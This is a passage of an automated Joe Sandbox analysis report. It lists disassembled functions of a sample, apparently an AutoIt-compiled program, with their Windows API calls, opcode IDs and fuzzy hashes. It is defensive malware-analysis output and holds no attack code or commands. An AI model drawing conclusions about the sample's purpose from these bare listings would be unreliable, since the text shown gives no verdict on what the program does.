                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                    • String ID:
                                                    • API String ID: 1396898556-0
                                                    • Opcode ID: d3d9e8ea25a9abca74fc72ae45e2e29e3467ee63fd3101e7cd2d6d4b7b35e8ca
                                                    • Instruction ID: c431e3816fc8a7a5a32a5a4c3c2e2daca860278b78aa1b2b78adc92c5b190b6c
                                                    • Opcode Fuzzy Hash: d3d9e8ea25a9abca74fc72ae45e2e29e3467ee63fd3101e7cd2d6d4b7b35e8ca
                                                    • Instruction Fuzzy Hash: B611E7316D0216EBCF18FB70CC0AFAE77A99F40701F10C42DF541BA191EABC9A11AB95
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: cbdbda37454f878be5aaa8f5a4907d343702eb5e2a6fbab04f377d328726f301
                                                    • Instruction ID: e6858d14f9a6c14dd6816fcbf28e107da3441591397b670ec0d31a3ca9daa90d
                                                    • Opcode Fuzzy Hash: cbdbda37454f878be5aaa8f5a4907d343702eb5e2a6fbab04f377d328726f301
                                                    • Instruction Fuzzy Hash: E2115E76244601DFCB24DF28E481916F7F9FF49350B60C82EE49ACB261E736E841CB50
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 6878a57106b723d5263bedb4a078cc64788b497ffc78774010b67a19cf3ba0bb
                                                    • Instruction ID: 83c8a5842454d9079c158bebc92286eec80f3a7684c886b9640ae6d8ede891dc
                                                    • Opcode Fuzzy Hash: 6878a57106b723d5263bedb4a078cc64788b497ffc78774010b67a19cf3ba0bb
                                                    • Instruction Fuzzy Hash: 742134B4608741DFCB54DF54C458B1ABBE1BF89344F09896CF88A57322C739E849CBA2
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: c56ae0350e79e7dc7cf296be5e1f7aafe6e3e89e61c1803238559a6dfa02d677
                                                    • Instruction ID: 3ace0d2ad95187a2178ffdbd925249cdb56f8d97904c4042930f3f54eda8b87f
                                                    • Opcode Fuzzy Hash: c56ae0350e79e7dc7cf296be5e1f7aafe6e3e89e61c1803238559a6dfa02d677
                                                    • Instruction Fuzzy Hash: 6C012BB2250512AFD718DF38DC81D35F79CEF05760B60822AE916CF2D0E7349812C790
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
                                                    • Instruction ID: 31bfcb90f6b3017888e0089d8a595c2d98a76f2968dc47844990ca729cd30618
                                                    • Opcode Fuzzy Hash: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
                                                    • Instruction Fuzzy Hash: E701F972251701AED7246F38EC06F77BB9CDB447A0F50C52EF52ACA1D1EA35E5508790
                                                    APIs
                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 007E4998
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentVariable
                                                    • String ID:
                                                    • API String ID: 1431749950-0
                                                    • Opcode ID: 401f15c219f87c7a2d069df9d0b9da696f3e86ddd06c869b56eab92327f2a97f
                                                    • Instruction ID: b9110513951f5863396915a9f3e6ded76a298cb5b9d457646406601f7c499a35
                                                    • Opcode Fuzzy Hash: 401f15c219f87c7a2d069df9d0b9da696f3e86ddd06c869b56eab92327f2a97f
                                                    • Instruction Fuzzy Hash: C4F04435608109EFCB14FB65D84AC9F77BCEF49720B404056F9089B251DE75BD41C750
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _fseek
                                                    • String ID:
                                                    • API String ID: 2937370855-0
                                                    • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                    • Instruction ID: 53a643b67b6a590ecc0a0a10ea7cf60179caf1a4fad84d7462fc235bea07fc7e
                                                    • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                    • Instruction Fuzzy Hash: 61F085B6400208FFDF159F95EC04DEBBF79EB89320F00819CF9045A210D272EA218BA0
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,?,?,007827AF,?,00000001), ref: 00784A63
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 9da1f86b95fba57858813ee34ca7ca1ab98f801e686397e1847f6b6b50a81778
                                                    • Instruction ID: 72dcaddeec96ed52593c60914bb06b1992bd187a6102c604d6c862cf24443b90
                                                    • Opcode Fuzzy Hash: 9da1f86b95fba57858813ee34ca7ca1ab98f801e686397e1847f6b6b50a81778
                                                    • Instruction Fuzzy Hash: 64F01571185712CFCB38AF64E494816BBF1BF14325320C92EE1D68B611C7BA9984DF55
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock
                                                    • String ID:
                                                    • API String ID: 2638373210-0
                                                    • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                    • Instruction ID: 034805f09dd58d5e6fe514380c1de94324c0ac9d322466ca32ce1b7961f88d02
                                                    • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                    • Instruction Fuzzy Hash: 30F0F87240020DFFDF05DF90C945EAABB79FB14314F208589F9198A212D376EA21AB91
                                                    APIs
                                                      • Part of subcall function 007E1E06: CloseHandle.KERNEL32(?,?,?,007E2D8B,?,?), ref: 007E1E12
                                                      • Part of subcall function 007E1E06: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,007E2D8B,?,?), ref: 007E1E1F
                                                    • __beginthread.LIBCMT ref: 007E2D93
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateEventHandle__beginthread
                                                    • String ID:
                                                    • API String ID: 1494023155-0
                                                    • Opcode ID: addbac5be56e9a40993c08c2a223629a33a52685745689a79add4eb63863f9c4
                                                    • Instruction ID: 5ca591ca7c3ac849d7312ab8cc9b853dee043739db8b168398403334bed29c17
                                                    • Opcode Fuzzy Hash: addbac5be56e9a40993c08c2a223629a33a52685745689a79add4eb63863f9c4
                                                    • Instruction Fuzzy Hash: D6E0D871916394A6D771E576DC0BFD67E9C4F08350F040426F54910193D67C5585C2E1
                                                    APIs
                                                    • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 007909E4
                                                      • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: LongNamePath_memmove
                                                    • String ID:
                                                    • API String ID: 2514874351-0
                                                    • Opcode ID: 8afec97575457e87125ffd6ff51f96e16aa5431f3bbdc2ba94b3be1f11c7079c
                                                    • Instruction ID: 3b29071c607f504e873fb6f78c6b774d13b97c6cd518449383be0c64fd67f677
                                                    • Opcode Fuzzy Hash: 8afec97575457e87125ffd6ff51f96e16aa5431f3bbdc2ba94b3be1f11c7079c
                                                    • Instruction Fuzzy Hash: 94E0863690012857C721A6989C0AFEA77DDEB896A0F0502B6FC08D7344D9649C818A91
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,007D3BFE), ref: 007D4FED
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: c80ba374d4a18d1b287b4d38bdd914fe54dc3949002c6b426c81da18f4965c8c
                                                    • Instruction ID: 74024ab245ae7a00f49aa614dfe4aca3ca7616f949740f75056aa7dc31baa959
                                                    • Opcode Fuzzy Hash: c80ba374d4a18d1b287b4d38bdd914fe54dc3949002c6b426c81da18f4965c8c
                                                    • Instruction Fuzzy Hash: 49B09234000600579E781F3C99481A933A168423A9BDC1B82E478856F1963D884FA920
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: __wfsopen
                                                    • String ID:
                                                    • API String ID: 197181222-0
                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction ID: b2d35f90c2f9aa07c9b2b753bb7626d1facca782fed56f808c62141ea5f2e39c
                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction Fuzzy Hash: 50B0927644020CB7CE022A82FC03E593B299B40A68F408020FB0C1C172A677A6A09689
                                                    APIs
                                                    • _doexit.LIBCMT ref: 00793592
                                                      • Part of subcall function 00793459: __lock.LIBCMT ref: 00793467
                                                      • Part of subcall function 00793459: DecodePointer.KERNEL32(0082CB70,0000001C,007933B2,00791003,00000001,00000000,?,00793300,000000FF,?,00799E5E,00000011,00791003,?,00799CAC,0000000D), ref: 007934A6
                                                      • Part of subcall function 00793459: DecodePointer.KERNEL32(?,00793300,000000FF,?,00799E5E,00000011,00791003,?,00799CAC,0000000D), ref: 007934B7
                                                      • Part of subcall function 00793459: EncodePointer.KERNEL32(00000000,?,00793300,000000FF,?,00799E5E,00000011,00791003,?,00799CAC,0000000D), ref: 007934D0
                                                      • Part of subcall function 00793459: DecodePointer.KERNEL32(-00000004,?,00793300,000000FF,?,00799E5E,00000011,00791003,?,00799CAC,0000000D), ref: 007934E0
                                                      • Part of subcall function 00793459: EncodePointer.KERNEL32(00000000,?,00793300,000000FF,?,00799E5E,00000011,00791003,?,00799CAC,0000000D), ref: 007934E6
                                                      • Part of subcall function 00793459: DecodePointer.KERNEL32(?,00793300,000000FF,?,00799E5E,00000011,00791003,?,00799CAC,0000000D), ref: 007934FC
                                                      • Part of subcall function 00793459: DecodePointer.KERNEL32(?,00793300,000000FF,?,00799E5E,00000011,00791003,?,00799CAC,0000000D), ref: 00793507
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Pointer$Decode$Encode$__lock_doexit
                                                    • String ID:
                                                    • API String ID: 2158581194-0
                                                    • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                    • Instruction ID: 685cd33f304599776b79cecb9d57b6ae5abbe5ddf870b287fcbedf8340f64758
                                                    • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                    • Instruction Fuzzy Hash: 96B0123198030C73DE112541FC03F253B0D4740B50F110021FE0C1C1F1A5D3766040C9
                                                    APIs
                                                      • Part of subcall function 007D4005: FindFirstFileW.KERNEL32(?,?), ref: 007D407C
                                                      • Part of subcall function 007D4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 007D40CC
                                                      • Part of subcall function 007D4005: FindNextFileW.KERNEL32(00000000,00000010), ref: 007D40DD
                                                      • Part of subcall function 007D4005: FindClose.KERNEL32(00000000), ref: 007D40F4
                                                    • GetLastError.KERNEL32 ref: 007DC292
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                    • String ID:
                                                    • API String ID: 2191629493-0
                                                    • Opcode ID: 04f6ddc5be352773ecbf42d7337a7c68d5fee979fb211aab806c2edaa72a6e75
                                                    • Instruction ID: 64406521df6fb31e6bda35442312506234dae8f3895a92daad87db101a36152d
                                                    • Opcode Fuzzy Hash: 04f6ddc5be352773ecbf42d7337a7c68d5fee979fb211aab806c2edaa72a6e75
                                                    • Instruction Fuzzy Hash: FFF058323102108FCB21EB59D859B6AB7E5AF88360F05805AFA499B352CB78B801CB94
                                                    APIs
                                                      • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007FD208
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007FD249
                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 007FD28E
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007FD2B8
                                                    • SendMessageW.USER32 ref: 007FD2E1
                                                    • _wcsncpy.LIBCMT ref: 007FD359
                                                    • GetKeyState.USER32(00000011), ref: 007FD37A
                                                    • GetKeyState.USER32(00000009), ref: 007FD387
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007FD39D
                                                    • GetKeyState.USER32(00000010), ref: 007FD3A7
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007FD3D0
                                                    • SendMessageW.USER32 ref: 007FD3F7
                                                    • SendMessageW.USER32(?,00001030,?,007FB9BA), ref: 007FD4FD
                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007FD513
                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007FD526
                                                    • SetCapture.USER32(?), ref: 007FD52F
                                                    • ClientToScreen.USER32(?,?), ref: 007FD594
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007FD5A1
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007FD5BB
                                                    • ReleaseCapture.USER32 ref: 007FD5C6
                                                    • GetCursorPos.USER32(?), ref: 007FD600
                                                    • ScreenToClient.USER32(?,?), ref: 007FD60D
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 007FD669
                                                    • SendMessageW.USER32 ref: 007FD697
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 007FD6D4
                                                    • SendMessageW.USER32 ref: 007FD703
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007FD724
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007FD733
                                                    • GetCursorPos.USER32(?), ref: 007FD753
                                                    • ScreenToClient.USER32(?,?), ref: 007FD760
                                                    • GetParent.USER32(?), ref: 007FD780
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 007FD7E9
                                                    • SendMessageW.USER32 ref: 007FD81A
                                                    • ClientToScreen.USER32(?,?), ref: 007FD878
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007FD8A8
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 007FD8D2
                                                    • SendMessageW.USER32 ref: 007FD8F5
                                                    • ClientToScreen.USER32(?,?), ref: 007FD947
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007FD97B
                                                      • Part of subcall function 007729AB: GetWindowLongW.USER32(?,000000EB), ref: 007729BC
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 007FDA17
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$F
                                                    • API String ID: 3977979337-4164748364
                                                    • Opcode ID: a4511c23a6336752866fdb3fb777a3d435b7fe287e7b8d8c3befa47227a61fc6
                                                    • Instruction ID: d34f0fbacebad5101ca227e3a42fe8b5d47c2be7c4ca67389a61e1190d6f0e56
                                                    • Opcode Fuzzy Hash: a4511c23a6336752866fdb3fb777a3d435b7fe287e7b8d8c3befa47227a61fc6
                                                    • Instruction Fuzzy Hash: E2427B702042499FD724DF28C848BAABBE6FF89310F140619F7A5873A1D775EC54DB91
                                                    APIs
                                                    • GetForegroundWindow.USER32(00000000,?), ref: 00785EE2
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007C10D7
                                                    • IsIconic.USER32(?), ref: 007C10E0
                                                    • ShowWindow.USER32(?,00000009), ref: 007C10ED
                                                    • SetForegroundWindow.USER32(?), ref: 007C10F7
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007C110D
                                                    • GetCurrentThreadId.KERNEL32 ref: 007C1114
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 007C1120
                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 007C1131
                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 007C1139
                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 007C1141
                                                    • SetForegroundWindow.USER32(?), ref: 007C1144
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007C1159
                                                    • keybd_event.USER32(00000012,00000000), ref: 007C1164
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007C116E
                                                    • keybd_event.USER32(00000012,00000000), ref: 007C1173
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007C117C
                                                    • keybd_event.USER32(00000012,00000000), ref: 007C1181
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007C118B
                                                    • keybd_event.USER32(00000012,00000000), ref: 007C1190
                                                    • SetForegroundWindow.USER32(?), ref: 007C1193
                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 007C11BA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
